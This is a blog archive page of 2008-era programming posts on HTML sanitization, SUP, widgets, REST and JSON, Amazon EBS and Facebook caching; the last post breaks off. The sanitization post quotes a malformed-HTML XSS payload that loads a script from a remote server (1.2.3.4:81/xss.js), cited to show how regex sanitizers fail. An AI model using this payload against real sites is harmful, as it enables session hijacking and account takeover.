I'm often surprised by how common it is for developers to prefer reinventing the wheel to using off-the-shelf libraries when solving problems tasks. This practice isn't limited to newbies who don't know any better but also to experienced developers who should. Experienced developers often make excuses about not wanting to take unnecessary dependencies or not trusting the code of others when justifying reinventing the wheel. For example, take this conversation that flowed through my Twitter stream yesterday

Jon Galloway
jongalloway: @
codinghorror Oh, one last thing - I'd rather trust the tough code (memory management, SSL, parsing) to experts and common libraries. about 11 hours ago from Witty in reply to codinghorror

Jeff Atwood
codinghorror @jongalloway you're right, coding is hard. Let's go shopping! about 12 hours ago from web in reply to jongalloway

Jeff Atwood
codinghorror @jongalloway I'd rather make my own mistakes (for things I care about) than blindly inherit other people's mistakes. YMMV. about 12 hours ago from web in reply to jongalloway

The background on this conversation is that Jeff Atwood (aka codinghorror) recently decided to quit his job and create a new Website called stackoverflow.com. It is a question and answer site for asking programming questions where users can vote on the best answers to specific questions. You can think of it as Yahoo! Answers but dedicated to programming questions. You can read a review of the site by Michiel de Mare for more information.

Recently Jeff Atwood blogged about how he was planning to use regular expressions to sanitize HTML input on StackOverflow.com in his blog post entitled Regular Expressions: Now You Have Two Problems where he wrote

I'd like to illustrate with an actual example, a regular expression I recently wrote to strip out dangerous HTML from input. This is extracted from the SanitizeHtml routine I posted on RefactorMyCode.

var whitelist =
 @"</?p>|<br\s?/?>|</?b>|</?strong>|</?i>|</?em>|
  </?s>|</?strike>|</?blockquote>|</?sub>|</?super>|
  </?h(1|2|3)>|</?pre>|<hr\s?/?>|</?code>|</?ul>|
  </?ol>|</?li>|</a>|<a[^>]+>|<img[^>]+/?>";

What do you see here? The variable name whitelist is a strong hint. One thing I like about regular expressions is that they generally look like what they're matching. You see a list of HTML tags, right? Maybe with and without their closing tags?

The problem Jeff was trying to solve is how to allow a subset of HTML tags while stripping out all other HTML so as to prevent cross site scripting (XSS) attacks. The problem with Jeff's approach which was pointed out in the comments by many people including Simon Willison is that using regexes to filter HTML input in this way assumes that you will get fairly well-formed HTML. The problem with that approach which many developers have found out the hard way is that you also have to worry about malformed HTML due to the liberal HTML parsing policies of many modern Web browsers. Thus to use this approach you have to pretty much reverse engineer every HTML parsing quirk of common browsers if you don't want to end up storing HTML which looks safe but actually contains an exploit. Thus to utilize this approach Jeff really should have been looking at using a full fledged HTML parser such as SgmlReader or Beautiful Soup instead of regular expressions.

It didn't take long for the users of StackOverflow.com to show Jeff the error of his ways as evidenced by his post Protecting Your Cookies: HttpOnly where he acknowledges his mistake as follows

So I have this friend. I've told him time and time again how dangerous XSS vulnerabilities are, and how XSS is now the most common of all publicly reported security vulnerabilities -- dwarfing old standards like buffer overruns and SQL injection. But will he listen? No. He's hard headed. He had to go and write his own HTML sanitizer. Because, well, how difficult can it be? How dangerous could this silly little toy scripting language running inside a browser be?

As it turns out, far more dangerous than expected.

Imagine, then, the surprise of my friend when he noticed some enterprising users on his website were logged in as him and happily banging away on the system with full unfettered administrative privileges.

How did this happen? XSS, of course. It all started with this bit of script added to a user's profile page.

<img src=""http://www.a.com/a.jpg<script type=text/javascript 
src="http://1.2.3.4:81/xss.js">" /><<img 
src=""http://www.a.com/a.jpg</script>"

Through clever construction, the malformed URL just manages to squeak past the sanitizer. The final rendered code, when viewed in the browser, loads and executes a script from that remote server. 

The sad thing is that Jeff Atwood isn't the first nor will he be the last programmer to think to himself "It's just HTML sanitization, how hard can it be?". There are many lists of Top HTML Validation Bloopers that show tricky it is to get the right solution to this seemingly trivial problem. Additionally, it is sad to note that despite his recent experience, Jeff Atwood still argues that he'd rather make his own mistakes than blindly inherit the mistakes of others as justification for continuing to reinvent the wheel in the future. That is unfortunate given that is a bad attitude for a professional software developer to have.

Rolling your own solution to a common problem should be the last option on your list not the first. Otherwise, you might just end up a candidate for The Daily WTF and deservedly so.

Now Playing: T-Pain - Cant Believe It (feat. Lil Wayne)


 

Categories: Programming

Paul Buchheit of FriendFeed has written up a proposal for a new protocol that Web sites can implement to reduce the load on their services from social network aggregators like FriendFeed and SocialThing. He unveils his proposal in his post Simple Update Protocol: Fetch updates from feeds faster which is excerpted below

When you add a web site like Flickr or Google Reader to FriendFeed, FriendFeed's servers constantly download your feed from the service to get your updates as quickly as possible. FriendFeed's user base has grown quite a bit since launch, and our servers now download millions of feeds from over 43 services every hour.

One of the limitations of this approach is that it is difficult to get updates from services quickly without FriendFeed's crawler overloading other sites' servers with update checks. Gary Burd and I have thought quite a bit about ways we could augment existing feed formats like Atom and RSS to make fetching updates faster and more efficient. Our proposal, which we have named Simple Update Protocol, or SUP, is below.
...
Sites wishing to produce a SUP feed must do two things:

  • Add a special <link> tag to their SUP enabled Atom or RSS feeds. This <link> tag includes the feed's SUP-ID and the URL of the appropriate SUP feed.
  • Generate a SUP feed which lists the SUP-IDs of all recently updated feeds.

Feed consumers can add SUP support by:

  • Storing the SUP-IDs of the Atom/RSS feeds they consume.
  • Watching for those SUP-IDs in their associated SUP feeds.

By using SUP-IDs instead of feed urls, we avoid having to expose the feed url, avoid URL canonicalization issues, and produce a more compact update feed (because SUP-IDs can be a database id or some other short token assigned by the service). Because it is still possible to miss updates due to server errors or other malfunctions, SUP does not completely eliminate the need for polling.

Although there's a healthy conversation about SUP going on in FriendFeed in response to one of my tweets, I thought it would be worth sharing some thoughts on this with a broader audience.

The problem statement that FriendFeed's SUP addresses is the following issue raised in my previous post When REST Doesn't Scale, XMPP to the Rescue?

On July 21st, FriendFeed had 45,000 users who had associated their Flickr profiles with their FriendFeed account. FriendFeed polls Flickr about once every 20 – 30 minutes to see if the user has uploaded new pictures. However only about 6,000 of those users logged into Flickr that day, let alone uploaded pictures. Thus there were literally millions of HTTP requests made by FriendFeed that were totally unnecessary.

FriendFeed's proposal is similar to the Six Apart Update Stream and the Twitter XMPP Firehose in that it is a data stream containing information about all of the updates users are making on a particular service. It differs in a key way in that it doesn't actually contain the data from the user updates but instead identifiers which can be used to determine the users that changed so their feeds can be polled.

This approach aims at protecting feeds that use security through obscurity such as the Google Reader's Shared Items feed and Netflix's Personalized Feeds. The user shares their "secret" feed URL with FriendFeed who then obtains the SUP ID of the user's feed when the feed is first polled. Then whenever that SUP ID is seen in the SUP feed by FriendFeed, they know to go re-poll the user's "secret" feed URL.

For services that are getting a ton of traffic from social network aggregators or Web-based feed readers it does make sense to provide some sort of update stream or fire hose to reduce the amount of polling that gets done. In addition, it also makes sense that if more and more services are going to provide such update streams then it should be standardized so that social network aggregators and similar services do not end up having to target multiple update protocols.

I believe that at the end we will see a continuum of options in this space. The vast majority of services will be OK with the load generated by social networking aggregators and Web-based feed readers when polling their feeds. These services won't see the point of building additional features to handle this load. Some services will run the numbers like Twitter & Six Apart have done and will provide update streams in an attempt to reduce the impact of polling. For these services, SUP seems like a somewhat elegant solution and it would be good to standardize on something, anything at all is better than each site having its own custom solution. For a smaller set of services, this still won't be enough since they don't provide feeds (e.g. Blockbuster's use of Facebook Beacon) and you'll need an explicit server to server publish-subscribe mechanism. XMPP or perhaps something an HTTP based publish-subscribe mechanism like what Joshua Schachter proposed a few weeks ago will be the best fit for those scenarios. 

Now Playing: Jodeci - I'm Still Waiting


 

Categories: Web Development

I've been reading about the Ning vs. WidgetLaboratory drama on TechCrunch. The meat of the conflict seems to be that widgets from WidgetLaboratory were so degrading the user experience of Ning that they had to be cut off. The relevant excerpts from the most recent TechCrunch story on the war of words are below

For those of you not closely following the drama between social network platform Ning and a popular widget provider called WidgetLaboratory, you can read the background here. On Friday Ning unceremoniously shut down their access to Ning, making all those widgets vanish.
...
In an email to WL on August 2 (more than three weeks ago), CEO Gina Bianchini wrote “Our only goal is to have you build your products in such a way that doesn’t slow down the networks running your products or takedown the Ning Platform with what you’re doing. Both of those would result in us needing to shutdown WidgetLaboratory products and that’s has never been our first choice of options. Hopefully, you know this after 8 months of working with us.”

Ignoring the he said, she said nature of the communication between both companies, there is a legitimate concern that 3rd party widgets included on the pages of a Web site can degrade the performance to the extent that the site becomes unusably slow. In fact, TechCrunch has had similar problems with 3rd party widgets as Mike Arrington has mentioned on his personal blog which led to him excluding the widgets from his site.

Typically, widgets are embedded in a site by including references to Javascript hosted on a 3rd party site in the page's HTML. This means rendering the page is dependent on how quickly the script files can be downloaded from the 3rd party site AND how long it takes for the script to execute especially since it may also fetch data from one or more servers as well. Thus a slow server or a badly written script can make every page that embeds the widget unbearably slow to render. Given that the ability to embed widgets is a key feature of social networking sites, it is important for such sites to figure out how to isolate their user experience from badly written widgets or widgets hosted on slow Web servers.

Below are some best practices that have emerged on how social networking sites can immunize themselves from the kinds of problems Ning has had with WidgetLaboratory

  1. Host the Scripts Yourself: If you have a popular site, it is quite likely that you have more resources to handle lots of page views than the typical widget developer. Thus it makes sense to take away the dependency on externally hosted scripts by hosting the widgets yourself. Microsoft encourages developers to submit their gadgets to Windows Live Gallery if they want to build gadgets for my.live.com or Windows Live Spaces. For it's AJAX homepage service, Google does not require developers to submit gadgets to them for hosting but instead caches gadget data for hours at a time which means they are effectively hosting the gadgets themselves for the majority of the accesses by their users.

  2. Keep External Dependencies off of Pages that Need to Render Quickly: In many cases, it isn't feasible to host all of the data and content related to widgets that are being shown on your site. In that case, you should ensure that the key scenarios on your Web site are insulated from the problems caused by slow or broken 3rd party widgets. For example, on Facebook viewing someone's profile is a key part of the user experience that is important to make sure happens as quickly and as smoothly as possible. For this reason, Facebook caches all 3rd party content that shows up on a user's profile and requires applications to call Profile.SetFBML to add content to the profile instead of providing a way to directly embed widgets on a user's profile.

  3. Make It Clear Who Is to Blame if Things go Awry: One of the issues raised by Ning in their conflict with WidgetLaboratory is that user pages wouldn't render correctly or would show degraded performance due to WidgetLaboratory's widgets but Ning would get the support calls. This kind of user confusion is avoided if the user experience makes it clear when the failure of a page to render correctly is the fault of the external widget and when it is part of the hosting site. For example, Facebook Canvas Pages for applications make it clear that the user is using a 3rd party application and not part of the core Facebook experience. I've seen lots of user complain about the slowness of Scrabulous and Scrabble but never seen anyone who thought that Facebook was to blame and not the application developers.

Following some of these practices would have saved Ning and its users some of their current grief.

Now Playing: Ice Cube - Get Money, Spend Money, No Money


 

Categories: Platforms | Social Software

My recent post, Explaining REST To Damien Katz, led to some insightful comments from Dave Winer and Tim Bray about what proponents of building RESTful Web services can learn from remote procedure call (RPC) technologies like SOAP and XML-RPC. 

In his post, Dare left something out (and it's important) Dave Winer wrote

Really ought to include it in your thinking, Dare and everyone else. You're missing out on something that works really well. You should at least learn the lessons and add to REST what it needs to catch up with XML-RPC. Seriously.

What's missing in REST, btw, is a standard method of serializing structs, lists and scalar types. The languages we use have a lot more in common than you might think. We're all writing code, again and again, every time we support a new interface that could be written once and then baked into the kernels of our languages, and then our operating systems. Apple actually did this with Mac OS, XML-RPC support is baked in. So did Python. So if you think it's just me saying this, you should take another look.

Dave has a valid point, a lot of the time communication between distributed systems is simply passing around serialized objects and/or collections of objects. In such cases, having a lightweight standard representation for serialized objects which is supported on multiple platforms would be beneficial. Where Dave goes astray is in his assertion that no such technology exists for developers building RESTful Web services. Actually one does, and it is widely deployed on the Web today. JavaScript Object Notation (JSON) which is described in RFC 4627 is a widely deployed and well-defined media type (application/json) for representing serialized structs, lists and scalar values on the Web. 

There are libraries for processing JSON on practically every popular platform from "corporate" platforms like Java and the .NET Framework to Web scripting languages like Python and Ruby. In addition, JSON is attractive because it is natively available in modern Web browsers that support JavaScript which means you can use it to build services that can be consumed by Web browsers, other Web services or desktop applications with a single end point.

Tim Bray cautioned REST proponents against blindly rejecting the features typically associated with RPC systems and SOAP/WS-* in his post REST Questions where he wrote

Has REST Been Fortunate in its Enemies? · I have been among the most vocal of those sneering at WS-*, and I’m comfortable with what I’ve said. But that doesn’t prove that the core WS-* ideas are wrong. Here are some of the handicaps WS-* struggled under:

  • Lousy foundational technologies (XSD and WSDL).

  • A Microsoft/IBM-driven process that was cripplingly product-linked and political.

  • Designers undereducated in the realities of the Web as it is.

  • Unnecessary detours into Architecture Astronautics.

As a result, we should be really careful about drawing lessons from the failure of WS-*. Specifically:

  • Just because the XSD type system is malformed, you can’t conclude that the notion of schema-driven mapping between program data types and representation payloads is harmful.

  • Just because WSDL is a crock, you can’t conclude that exposing a machine-readable contract for a service is a necessarily bad idea.

  • Just because UDDI never took off, you can’t conclude that service registries are dumb.

  • Just because SOAP has a damaging MustUnderstand facility and grew a lot of ancillary specification hair, you can’t conclude that some sort of re-usable payload wrapper is necessarily a dead-end path.

  • Just because the WS-* security specifications are overengineered and based on a shaky canonicalization spec, you can’t conclude that message-level security and signing aren’t sometimes real important.

And so on. I personally tend to think that schema-driven mapping is hopeless, contracts are interesting, registries are a fantasy, and payload wrappers are very promising. But I don’t think that the history of WS-* is a very good argument for any of those positions.

In a lot of situations where applications consume XML, the first thing the application does is convert the XML into an object graph representative of the business logic of the application. The SOAP/WS-* way of doing this was to define an XSD schema for the XML payload and then use some object<->XML mapping layer to convert the XML to objects. The problem with this approach was that there is a fundamental impedance mismatch between XSD types and OO types which led to horrible interoperability problems since no two platforms could agree on how to map the various esoteric type system features of XSD into the structs, lists and scalar types that are the building block of all OO type systems. However these problems go away if you use a data format that was explicitly designed for describing serialized data objects like JSON.

Providing a machine readable description of a service's end points is useful, especially on the Web where multiple services may expose the same interface. For example, when you visit my weblog at http://www.25hoursaday.com/weblog/ using Firefox 2 or higher and Internet Explorer 7 or higher the browser immediately lights up with a feed icon which allows you to subscribe to my Atom feed from your Web browser. This happens because I've provided a machine readable description of my feed end points on my blog. The Atom Publishing Protocol, which is one of the most well-designed RESTful protocols out there, has a notion of service documents which enable client applications to discover the capabilities and locations of the various end points of the service.

If you put together the notion of service documents with using JSON as the payload format for a service endpoint, you're close to getting the touted programmer friendliness of RPC technologies like XML-RPC & SOAP/WSDL while still building a RESTful service which works with the Web instead of against it.

The only problem is how to deal with statically typed languages like C# and Java. These languages need the types of the objects that application will consume from a Web service defined up front. So if we could just figure out how to come up with service documents for JSON services that included the notion of a class definition, we could pretty much have our cake and eat it to with regards to getting the ease of use of an RPC system while building a RESTful service.

If this sounds interesting to you, then you should go over and read Joe Gregorio's original post on RESTful JSON and then join the restful-json mailing list. Joe's proposal is on the right path although I think he is letting his background as an editor of the Atom Publishing Protocol specification skew his thinking with regards to what developers would find most useful from a Json Publishing Protocol (JsonPub).

Now Playing: G-Unit - Beg For Mercy


 

August 24, 2008
@ 11:32 AM

Last week my blog was offline for a day or so because I was the victim of a flood of SQL injection attacks that are still hitting my Web site at the rate of multiple requests a second. I eventually managed to counter the attacks by installing URLScan 3.0 and configuring it to reject HTTP requests that resemble SQL injection attacks. I found out about URLScan in two ways; from a blog post Phil Haack wrote about Dealing with Denial of Service Attacks where it seems he's been caught up in the same wave of attacks that brought down my blog and via an IM from Scott Hanselman who saw my tweet on Twitter about being hacked and pointed me to his blog post on the topic entitled Hacked! And I didn't like it - URLScan is Step Zero.

This reminded me that I similarly found another useful utility, WinDirStat, via a blog post as well. In fact when i think about it, a lot of the software I end up trying out is found via direct or indirect recommendations from people I know. Typically through blog posts, tweets or some other communication via a social networking or social media service. This phenomenon can be clearly observed in closed application ecosystems like the Facebook platform, where statistics have shown that the majority of users install new applications after viewing them on the profiles of their friends.

One of the things I find most interesting about the Facebook platform and now the Apple App Store is that they are revolutionizing how we think about software distribution. Today, finding interesting new desktop/server/Web apps either happens serendipitously via word of mouth or [rarely] is the result of advertising or PR. However finding interesting new applications if you are a user of Facebook or the Apple iPhone isn't a matter of serendipity. There are well understood ways of finding interesting applications that harnesses social and network effects from user ratings to simply finding out what applications your friends are using.

As a user, I sometimes wish I had an equivalent experience as a user of desktop applications and their extensions. I've often thought it would be cool to be able to browse the software likes and dislikes of people such as Omar Shahine, Scott Hanselman and Mike Torres to see what their favorite Windows utilities and mobile applications were. As a developer of a feed reader, although it is plain to see that Windows has a lot of reach since practically everyone runs it sometimes I'm envious of the built in viral distribution features that come with the Facebook platform or the unified software distribution experience that is the iPhone App Store. Sure beats hosting your app on SourceForge and hoping that your users are blogging about the app to spread it via word of mouth or paying for prominence on sites like Download.com.

A lot of the pieces are already there. Microsoft has a Windows Marketplace but for the life of me I'd have never found out about it if I didn't work at Microsoft and someone I know switched teams to start working there. There are also services provided by 3rd parties like Download.com, the Firefox Add-Ons page and Tucows. It would be interesting to see what could be stitched together if you throw in a social graph via something like Facebook Connect, an always-on well integrated desktop experience similar to the Apple App Store and one of the aforementioned sites. I suspect the results would be quite beneficial to app developers and users of Windows applications.

What do you think?

Now Playing: Metallica - The Day That Never Comes


 

Categories: Technology

According to Werner Vogels's blog post entitled Amazon EBS - Elastic Block Store has launched, it seems that my friends at Amazon have plugged a gaping hole in their cloud computing platform story. Werner writes

Back in the days when we made the architectural decision to virtualize the internal Amazon infrastructure one of the first steps we took was a deep analysis of the way that storage was used by the internal Amazon services. We had to make sure that the infrastructure storage solutions we were going to develop would be highly effective for developers by addressing the most common patterns first. That analysis led us to three top patterns:

  1. Key-Value storage. The majority of the Amazon storage patterns were based on primary key access leading to single value or object. This pattern led to the development of Amazon S3.
  2. Simple Structured Data storage. A second large category of storage patterns were satisfied by access to simple query interface into structured datasets. Fast indexing allows high-speed lookups over large dataset. This pattern led to the development of Amazon SimpleDB. A common pattern we see is that secondary keys to objects stored in Amazon S3 are stored in SimpleDB, where lookups result in sets of S3 (primary) keys.
  3. Block storage. The remaining bucket holds a variety of storage patterns ranging special file systems such as ZFS to applications managing their own block storage (e.g. cache servers) to relational databases. This category is served by Amazon EBS which provides the fundamental building block for implementing a variety of storage patterns.

What I like about Werner's post is that it shows that Amazon had a clear vision and strategy around providing hosted cloud services and has been steadily executing on it.

S3 handled what I've typically heard described as "blob storage". A typical Web application typically has media files and other resources (images, CSS stylesheets, scripts, video files, etc) that is simply accessed by name/path. However a lot of these resources also have metadata (e.g. a video file on YouTube has metadata about it's rating, who uploaded it, number of views, etc) which need to be stored as well. This need for queryable, schematized storage is where SimpleDB comes in. EC2 provides a virtual server that can be used for computation complete with a local file system instance which isn't persistent if the virtual server goes down for any reason. With SimpleDB and S3 you have the building blocks to build a large class of "Web 2.0" style applications when you throw in the computational capabilities provided by EC2.

However neither S3 nor SimpleDB provides a solution for a developer who simply wants the typical LAMP or WISC developer experience of building a database driven Web application or for applications that may have custom storage needs that don't fit neatly into the buckets of blob storage or schematized storage. Without access to a persistent filesystem, developers on Amazon's cloud computing platform have had to come up with sophisticated solutions involving backing data up manually from EC2 to S3 to get the desired experience.

EBS is the final piece in the puzzle that had prevented Amazon's cloud computing platform from being comparable to traditional hosting solutions. With EBS Amazon is now superior to most traditional hosting solutions from a developer usability perspective as well as cost. Google App Engine now looks like a plaything in comparison. In fact, you could build GAE on top of Amazon's cloud computing platform now that the EBS has solved persistent custom storage problem. It will be interesting to see if higher level cloud computing platforms such as App Engine start getting built on top of Amazon's cloud computing platform. Simply porting GAE wholesale would be an interesting academic exercise and a fun hacking project. 

Now Playing: T.I. - Whatever You Like


 

Last year I wrote a blog post entitled When Databases Lie: Consistency vs. Availability in Distributed Systems where I talked about the kinds of problems Web applications face when trying to keep data consistent across multiple databases spread out across the world.

Jason Sobel, a developer at Facebook has some details on how they've customized MySQL to solve a variation of the problem I posed in a blog post entitled Scaling Out where he writes

A bit of background on our caching model: when a user modifies a data object our infrastructure will write the new value in to a database and delete the old value from memcache (if it was present). The next time a user requests that data object we pull the result from the database and write it to memcache. Subsequent requests will pull the data from memcache until it expires out of the cache or is deleted by another update.

...

Consider the following example:

  1. I update my first name from "Jason" to "Monkey"
  2. We write "Monkey" in to the master database in California and delete my first name from memcache in California and Virginia
  3. Someone goes to my profile in Virginia
  4. We don't find my first name in memcache so we read from the Virginia slave database and get "Jason" because of replication lag
  5. We update Virginia memcache with my first name as "Jason"
  6. Replication catches up and we update the slave database with my first name as "Monkey"
  7. Someone else goes to my profile in Virginia
  8. We find my first name in memcache and return "Jason"

Until I update my first name again or it falls out of cache and we go back to the database, we will show my first name as "Jason" in Virginia and "Monkey" in California. Confusing? You bet. Welcome to the world of distributed systems, where consistency is a really hard problem.
Fortunately, the solution is a lot easier to explain than the problem. We made a small change to MySQL that allows us to tack on extra information in the replication stream that is updating the slave database. We used this feature to append all the data objects that are changing for a given query and then the slave database "sees" these objects and is responsible for deleting the value from cache after it performs the update to the database.

...

The new workflow becomes (changed items in bold):

  1. I update my first name from "Jason" to "Monkey"
  2. We write "Monkey" in to the master database in California and delete my first name from memcache in California but not Virginia
  3. Someone goes to my profile in Virginia
  4. We find my first name in memcache and return "Jason"
  5. Replication catches up and we update the slave database with my first name as "Monkey." We also delete my first name from Virginia memcache because that cache object showed up in the replication stream
  6. Someone else goes to my profile in Virginia
  7. We don't find my first name in memcache so we read from the slave and get "Monkey"

Facebook's solution is clever and at first I couldn't shake the feeling that it is an example of extremely tight coupling for database replication to also be responsible for evicting expired items from your in-memory cache. After some thought, I realized that this is no different from the SqlCacheDependency class in ASP.NET which allows you to create a dependency between objects in your ASP.NET cache and those in your SQL database. When the underlying tables change, the Cache is updated to reflect this change in database state.

In fact, the combination of replication and the SqlCacheDependency class should mean that you get this sort of behavior for free if you are using ASP.NET caching and SQL Server. Unfortunately, it looks like Microsoft's upcoming in-memory distributed object caching product, Velocity, won't support SqlCacheDependency in its initial release according to a comment by one its developers.  

Of course, there is a significant performance difference between actively monitoring the database for changes like SqlCacheDependency does and updating the cache when updates made to the database are received as part of the replication stream. I wonder if this pattern will turn out to be generally useful to Web developers (at least those of us who work on geo-distributed services) or whether this will just go down as a clever hack from those kids at Facebook that was cool to share.

Now Playing: Rihanna - Disturbia


 

Categories: Web Development

August 17, 2008
@ 12:33 PM

Damien Katz recently caused a stir on a bunch of the blogs I read with his post entitled REST, I just don't get it where he wrote

As the guy who created CouchDB, I should be a big cheerleader for RESTful architectures. But the truth is, I just don't get it.

For CouchDB, REST makes absolutely insanely perfect sense. Read a document, edit, put the document back. Beautiful. But for most applications, enterprise or not, I don't see what the big win is.

I know what is wrong with SOAP, and it has everything to do with unnecessary complexity and solving the same problems twice. But what is the big advantage of making all your calls into GET PUT and DELETE? If POST can handle everything you need, then what's the problem?

I guess what I mean to say is just because SOAP is a disaster, doesn't somehow make REST the answer. Simpler is better, and REST is generally simpler than SOAP. But there is nothing wrong with a plain old POST as an RPC call. If its easy to make all your calls conform to the RESTful verb architecture, then that's good, I guess.

His post made the rounds on the expected social news sites like programming.reddit and Hacker News, where I was amused to note that my blog is now being used as an example of silly REST dogma by REST skeptics in such discussions. From reading the Damien's post and the various comments in response, it seems clear that there are several misconceptions as to what constitutes REST and what its benefits are from a practical perspective.

Background: The Origins of REST vs. SOAP

The Representational State Transfer (REST) architectural style was first described in Chapter 5 of Roy Fielding's Ph.D dissertation published in 2000. It describes the architecture of the Web from the perspective of one of the authors of the HTTP 1.1 specification which was published the year before in 1999. Around the same time Don Box, Dave Winer and a bunch of folks at Microsoft came up with the Simple Object Access Protocol (SOAP) which they intended to be the standard protocol for building distributed applications on the Web.

Over the following years SOAP was embraced by pretty much every major enterprise software vendor and was being pushed hard by the W3C as the way to build distributed applications on the Web. However a lot of these vendors weren't really interested in building software for the Web but instead were more interested in porting all of their technologies and scenarios from enterprise integration technologies like CORBA to using buzzword compliant XML. This led to a bunch of additional specifications like XSD (type system), WSDL (IDL) and UDDI (naming/trading service). Developers initially embraced these technologies enthusiastically which led to the enterprise software vendors pumping out dozens of WS-* specifications. During this period not many thought or talked much about REST since no one talks about boring Ph.D dissertations. 

In 2002, a canary in the coal mine emerged in the form of Mark Baker. On mailing lists frequented by Web services types such as xml-dev and xml-dist-app, Mark began to persistently point out that SOAP was built on a bad foundation because it fundamentally ignored the architecture of the Web as defined by Roy Fielding's thesis. At first a lot of people labeled mark as a kook or malcontent for questioning the trend of the moment.

By 2005, the industry had enough  experience with SOAP to start seeing real problems using at as a way to build distributed applications on the Web. By that year many developers had started hearing stories like Nelson Minar's presentation on the problems Google had seen with SOAP based Web services and sought a simpler alternative. This is when the seeds of Mark Baker's evangelism of Roy's dissertation eventually bore fruit with the Web developer community.

However a Ph.D dissertation is hard to digest. So the message of REST started getting repackaged into simpler, bite-sized chunks but the meat of the message started getting lost along the way. Which led to several misconceptions about what REST actually is being propagated across the Web developer community.

Misconceptions About the REST Architectural Style

With that out of the way I can address the straw man argument presented in Damien's post. Damien states that building a RESTful Web Service is about using the HTTP PUT and DELETE methods instead of using HTTP POST when designing a Web API. In fact, he goes further to describe it as "the RESTful verb architecture" implying that choice of HTTP verbs that your service supports is the essence of REST.

This is incorrect.

Q: What is the Essence of REST? A: The Uniform Interface

REST explains how the Web works by defining the set of constraints on the various components in the current Web architecture. These constraints include

  • interaction is based on the client-server architectural style. User agents like Web browsers, RSS readers, Twitter clients, etc are examples of Web clients which talk to various Web servers without having a tight coupling to the internal implementation of the server.

  • communication between the client and server is stateless. The benefits of HTTP being a primarily stateless protocol is that statelessness increases scalability and reliability of services at the cost of introducing some complexity on the part of the client.

  • the Web architecture supports caching by requiring that requests that are cacheable or non-cacheable are labeled as such (i.e. via HTTP method and various caching related headers).

  • there is a uniform interface between components which allows them to communicate in a standard way but may not be optimized for specific application scenarios. There are four interface constraints: identification of resources; manipulation of resources through representations; self-descriptive messages; and, hypermedia as the engine of application state.

  • there can be multiple layers between client and server which act as intermediaries (e.g. proxies, gateways, load balancers, etc) without this being obvious to the requesting client or accepting server.

When you read the above list, the first thing you will note is that it describes the architecture of the World Wide Web. It doesn't describe the architecture of "a typical enterprise" or the internals of a cloud computing application.

Building a RESTful Web Service simply means paying attention to these characteristics of the Web. As you read them, some practical guidelines start becoming obvious. For example, if you want to take advantage of all the caching infrastructure that is built into the Web infrastructure, then you should use HTTP GET for services that retrieve data. This is just one of the many things Web Services built on SOAP got wrong.

The uniform interface constraints describe how a service built for the Web can be a good participant in the Web architecture. These constraints are described briefly as follows

  1. Identification of resources: A resource is any information item that can be named and represented (e.g. a document, a stock price at a given point in time, the current weather in Las Vegas, etc). Resources in your service should be identified using URIs.

  2. Manipulation of resources via representations: A representation is the physical representation of a resource and should correspond to a valid media type. Using standard media types as the data formats behind your service increases the reach of your service by making it accessible to a wide range of potential clients. Interaction with the resource should be based on retrieval and manipulation of the representation of the resource identified by its URI.

  3. Self-descriptive messages: Following the principles of statelessness in your service's interactions, using standard media types and correctly indicating the cacheability of messages via HTTP method usage and control headers ensures that messages are self descriptive. Self descriptive messages make it possible for messages to be processed by intermediaries between the client and server without impacting either.

  4. Hypermedia as the engine of application state: Application state should be expressed using URIs and hyperlinks to transition between states. This is probably the most controversial and least understood of the architectural constraints set forth in Roy Fielding's dissertation. In fact, Fielding's dissertation contains an explicit arguments against using HTTP cookies for representing application state to hammer this point home yet it is often ignored.

Benefits of Conforming to REST and the Uniform Interface to Web Developers

At this point, the benefits of building RESTful services for the Web should be self evident. The Web has a particular architecture and it makes sense that if you are deploying a service or API on the Web then it should take advantage of this architecture instead of fighting against it. There are millions of deployed clients, servers and intermediaries that support REST and it makes sense to be compatible with their expectations.

This doesn't mean you have to use DELETE and PUT when POST might suffice. It does mean understanding the difference between using POST versus using PUT to other participants in the Web architecture. Specifically, that PUT is idempotent while POST is not so a client of your service can assume that performing the same PUT two or three times in a row has the same effect as doing it once but cannot assume that for POST. Of course, it is up to you as a Web service developer to decide if you want your service to provide a more explicit contract with clients or not. What is important to note is that there is a practical reason for making the distinction between which HTTP verbs you should support.

There are other practical things to be mindful of as well to ensure that your service is being a good participant in the Web ecosystem. These include using GET instead of POST when retrieving a resource and properly utilizing the caching related headers as needed (If-Modified-Since/Last-Modified, If-None-Match/ETag, Cache-Control),  learning to utilize HTTP status codes correctly (i.e. errors shouldn't return HTTP 200 OK), keeping your design stateless to enable it to scale more cheaply and so on. The increased costs, scalability concerns and complexity that developers face when they ignore these principles is captured in blog posts and articles all over the Web such as Session State is Evil and Cache SOAP services on the client side. You don't have to look hard to find them. What most developers don't realize is that the problems they are facing are because they aren't keeping RESTful principles in mind.

Don't fight the Web, embrace it.

FURTHER READING

Now Playing: Public Enemy - Don't Believe the Hype


 

cognitive dissonance
n. Psychology.

A condition of conflict or anxiety resulting from inconsistency between one's beliefs and one's actions, such as opposing the slaughter of animals and eating meat.

Now Playing: The Beach Boys - Barbara Ann


 

Categories: Current Affairs

It is a fairly well known fact in the business community that the majority of mergers and acquisitions are a failure when it comes to increasing shareholder value, benefiting customers or any of the other metrics that are used to judge the "success" of an acquisition. Whenever you read a news story about some startup being acquired or two large companies merging, there is a greater than 50% chance that the resulting product or company will be of less value to customers and shareholders than if the deal had never happened.

When it comes to software company acquisitions, there are additional factors working against success that go beyond the typical laundry list of reasons that are given for why M&As usually result in failure. With technology company acquisitions not only are there a minefield of people and financial issues that have to be dealt with, there is also the real problem of what to do about technology mismatch that often exists across different companies.

Whenever a large software company acquires a startup, the first order of business is often an attempt to move the startup's application onto the larger company's technology infrastructure so that it can get benefits of "economies of scale" or some other buzzword that is typically a euphemism for "we bought you so now you're our bitches" that is not grounded in business realities. This often requires application rewrites that have the unfortunate consequence of causing the shipped application to stagnate as all efforts are poured into recreating the same application using a different technology. In addition, the founders of the startup typically get frustrated with what they [rightfully] deem as a pointless exercise and eventually move on to greener pastures. There are a number of examples of this that have occurred in the "Web 2.0" space as shown below

From Fred Wilson's post We Need A New Path To Liquidity

So if you can't take a company public, how do you get out? M&A has been the primary answer in the web/tech sector for the past eight years. And it's been a great period to sell companies. We've sold three in the past couple years out of our Union Square Ventures portfolio, delicious, FeedBurner, and TACODA, to Yahoo!, Google, and AOL, respectively. Were we happy to take their money? Yes. Were we happy with the outcome? Yes. Were they good buys for their new owners? On the face of it, yes.

But if you look deeper, I wonder. Delicious grew nicely for a while under Yahoo!'s ownership but recently the user base has fallen off pretty dramatically. I double checked this chart in compete and alexa and they all show the dropoff.

Delicious

